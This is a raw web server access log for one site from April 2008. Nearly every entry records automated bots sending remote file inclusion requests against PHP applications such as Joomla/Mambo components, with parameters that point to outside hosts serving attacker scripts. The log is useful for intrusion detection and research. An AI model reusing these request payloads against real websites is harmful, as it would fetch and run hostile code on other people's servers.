93.93.112.60 - - [30/Apr/2008:12:39:18 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:39:32 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:39:32 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:39:36 -0700] "GET /logs/access_080213.log/services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:39:37 -0700] "GET /services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:39:37 -0700] "GET /logs/services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:12:39:38 -0700] "GET /logs/access_080308.log/services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:12:39:52 -0700] "GET /logs/access_080214.log/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:12:39:58 -0700] "GET /news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:12:40:04 -0700] "GET /logs/news/bp_ncom.php?bnrep=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:40:17 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:40:54 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:40:57 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:41:06 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:41:07 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:41:19 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.229.176 - - [30/Apr/2008:12:43:00 -0700] "GET /logs/index.php?option=com_rss&feed=RSS0.91&no_html=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
213.193.229.176 - - [30/Apr/2008:12:43:04 -0700] "GET /index.php?option=com_rss&feed=RSS0.91&no_html=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:43:37 -0700] "GET /logs/access_071130.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:43:37 -0700] "GET /logs/access_071130.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [30/Apr/2008:12:43:37 -0700] "GET /logs/access_071130.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.77.27.142 - - [30/Apr/2008:12:43:47 -0700] "GET /logs/access.log//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:44:35 -0700] "GET /logs/access_080215.log//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:44:35 -0700] "GET //components/com_mamblog/mamblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:44:35 -0700] "GET /logs//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:45:09 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:45:09 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:45:10 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.218.158 - - [30/Apr/2008:12:45:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:45:21 -0700] "GET /logs/access_080215.log//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:45:22 -0700] "GET /logs//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:45:43 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:45:44 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:45:47 -0700] "GET //index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:45:48 -0700] "GET /logs//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:45:49 -0700] "GET //index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:45:49 -0700] "GET /logs//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:46:06 -0700] "GET /logs/access_080304.log//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:46:10 -0700] "GET /logs/access_080304.log//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.77.27.142 - - [30/Apr/2008:12:46:23 -0700] "GET /logs/access_080308.log//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:46:25 -0700] "GET /logs/access_080215.log//components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:46:26 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:46:26 -0700] "GET //components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:46:26 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:46:26 -0700] "GET /logs//components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:46:31 -0700] "GET /logs/access_080218.log//?php=paginahttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:46:45 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:46:46 -0700] "GET /logs//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:46:49 -0700] "GET //components/com_mamblog/mamblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:46:50 -0700] "GET //index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:47:00 -0700] "GET //components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:47:03 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:47:07 -0700] "GET //index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:47:08 -0700] "GET /logs//index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:47:08 -0700] "GET /logs/access_080223.log/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:47:09 -0700] "GET //?php=inchttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:47:11 -0700] "GET /index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:13 -0700] "GET /logs/access.log//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:16 -0700] "GET //index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [30/Apr/2008:12:47:16 -0700] "GET /logs/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:16 -0700] "GET /logs//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:20 -0700] "GET /logs//index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:22 -0700] "GET /logs/access_080117.log///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:22 -0700] "GET //index.php?sourcedir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:12:47:23 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cpanelx.yoll.net/m4k.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:47:23 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:24 -0700] "GET /logs/access.log//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:24 -0700] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:24 -0700] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:47:27 -0700] "GET /logs/access_080304.log//index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:27 -0700] "GET /logs/access_080117.log///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:27 -0700] "GET //index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:28 -0700] "GET /logs//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:29 -0700] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:30 -0700] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:47:34 -0700] "GET /logs/access_080223.log//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:47:54 -0700] "GET /logs/access_080223.log//index.php?body=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:48:15 -0700] "GET /logs/index.php?option=com_rss&feed=RSS1.0&no_html=1&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:48:18 -0700] "GET /index.php?option=com_rss&feed=RSS1.0&no_html=1&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 200 17 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:12:48:20 -0700] "GET /logs//index.php?sourcedir=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:48:22 -0700] "GET /logs/services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:48:22 -0700] "GET /services.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:12:48:24 -0700] "GET //index.php?sourcedir=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:48:46 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:12:48:48 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:12:48:48 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:53 -0700] "GET /logs/access_080117.log///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:54 -0700] "GET /logs/access.log//index.php?body=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:56 -0700] "GET ///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zreg.by.ru/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:57 -0700] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:58 -0700] "GET //index.php?body=http://zreg.by.ru/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:48:58 -0700] "GET /logs/mcf.php?content=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:48:59 -0700] "GET /logs//index.php?body=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:48:59 -0700] "GET /mcf.php?content=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:48:59 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:12:49:00 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:49:01 -0700] "GET /logs//index.php?body=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:49:03 -0700] "GET //index.php?body=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:49:15 -0700] "GET /logs//index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:49:20 -0700] "GET //index.php?sourcedir=http://zreg.by.ru/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:49:35 -0700] "GET /logs/access_080223.log//index.php?body=http://zreg.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:53 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:54 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:56 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:56 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:49:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:50:01 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:50:01 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:50:01 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:50:06 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:50:06 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:50:13 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:50:14 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [30/Apr/2008:12:50:17 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:12:50:36 -0700